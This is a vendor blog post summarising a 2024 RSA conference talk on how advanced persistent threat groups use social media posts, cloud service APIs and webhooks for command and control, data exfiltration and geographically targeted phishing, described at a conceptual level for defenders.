Has a recruiter recently reached out to you with an offer that looked too good to be true? Zscaler Chief Security Officer (CSO), Deepen Desai, explained why you should be wary at the 2024 RSA conference. His informative presentation focused on analyzing new tactics by advanced persistent threat (APT) groups. He was joined by Senior Manager of APT Research, Sudeep Singh, for their talk titled “Look at Recent APT Attacks: Using Social Media and Cloud Hosts as Launchpad”. As the name suggests, it offered an eye-opening look at how popular social media and cloud platforms are used in advanced cyberattacks.
Hiding in plain sight
Threat actors generally favor the path of least resistance, which is why phishing remains exponentially more popular than trying to exploit technical vulnerabilities. Tricking someone into giving up access is easier than breaking through complex access controls. Likewise, subverting the freely available features of social media sites is easier than compromising them for malicious use.
As Desai explains, “Typically what we see is threat actors place important information on social media profiles they own, or they might even add this information in comments or posts. These could be YouTube comments or Facebook posts. Typically this information is stored encoded and encrypted as opposed to plain text. There are two key advantages here for the threat actor. One is that they are able to make their infrastructure more resilient to take downs. The second is that threat actors can dynamically choose to update the information about their infrastructure at any given point of time.”
To illustrate this concept, Desai presented a three column slide depicting the relationship between the victim environment, cloud services/social media, and the attacker’s infrastructure.
For example, attackers may host information about the location of their command and control (C2) servers on their social media page. Malware active in the victim environment relies on communicating with C2 servers for updates, instructions, and other operations. If attackers have to suddenly move their C2 servers, the malware could lose contact with the attacker infrastructure. Such a loss of communication could derail the adversaries ability to exploit the victim’s environment. This problem is solved when adversaries publish the locations of their C2 servers on social media. If the C2 servers move, the adversaries simply post their new location on a social media page and the malware reestablishes contact.
Cloud API Abuse
Public cloud services with versatile application programming interfaces (APIs) offer threat actors several appealing capabilities. Services such as DropBox, Telegram, and Microsoft Graph provide file management functionality to users, allowing them to create, move, and delete files. Most cloud hosting services control access by giving users an API key that is used to connect to their online account. Attackers can create cloud service accounts and embed the corresponding API keys in malware. After infecting a system, the malware can use the embedded API key to connect and use the cloud service from the victim’s environment.
For example, consider malware in a user’s environment with an embedded API key for creating a DropBox account.
When malware creates a DropBox account from the victim’s environment (or other API-enabled cloud service), it establishes a fast path for data exfiltration. As in the social media example, the adversaries still use DropBox to facilitate C2 operations - but they can do much more. DropBox gives its users access to file operations such as folder creation and copying. These features make stealing data from the victim environment trivial. Adversaries copy the files they want from the victim’s system to the DopBox account, then collect them at leisure.
Webhooks
Webhooks are event-driven communications sent by web applications to a specific destination for processing. For example, a webhook can be configured to send data from an online form directly into an organization’s content management system (CMS). They can be used to send alerts when a web page visitor requests a chat session. The capability to use a triggered online event to send data also makes them a prime target for misuse by APT groups.
Threat actors can easily set up phishing pages that use webhooks to steal user credentials and other information. For example, if attackers redirect users to a fake (but believable) Microsoft login page, they can use a webhook to deliver any credentials the user enters. The attackers can also receive other information from the site visitor, such as their IP address and browser type.
Webhooks also help APT groups target specific geographical regions with their attacks. Adversaries can configure webhooks to report the general location of people visiting a web site, and use that data to determine whether to attack.
Desai explains, ”As an example, let's say threat actors are targeting a specific country like Poland. They choose to deliver the malware only if the request is originating from a machine in Poland. The victim visits a website, basically the website controlled by the attacker, which initiates a webhook call. This webhook call sends a notification to the threat actor. The threat actor performs an inspection on the request to check where it is coming from. In this case, they check whether the request is coming from Poland before they choose to deliver the malware. If the request is not coming from Poland, then they will send a clean decoy file so as to not raise an alert.”
Staying ahead of APTs
While the full RSAC presentation covered more ground (payload hosting, current APT campaigns, LinkedIn abuse, etc), the underlying message was clear - stay informed. Threat actors continuously abuse legitimate resources and find creative ways to weaponize popular technology. Social media and cloud services are simply the latest examples of adversaries’ well-established trend of subverting trusted technology to facilitate attacks. Being aware of the latest tactics, techniques, and procedures (TTPs) used by APTs is a key step for protecting your organization.
If you want more information on the latest TTPs and threat campaigns observed in the Zscaler Zero Trust Exchange, consider downloading the CXO REvolutionaries Cyber Update. For an in-depth look at cyberattacks occurring on a global scale, Zscaler provides regular reports from its threat research team, ThreatLabz.
What to read next
CISOs should brace for massive context, coverage, and communication upgrade, says CSA AI leader
CXO REvolutionaries Quarterly Cyber Update: Phishing and Ransomware Insights for the C-Suite (PDF)
Unpacking Airgap, Avalor, and RSAC with Nat Smith, product leader and ex-Gartner analyst (podcast)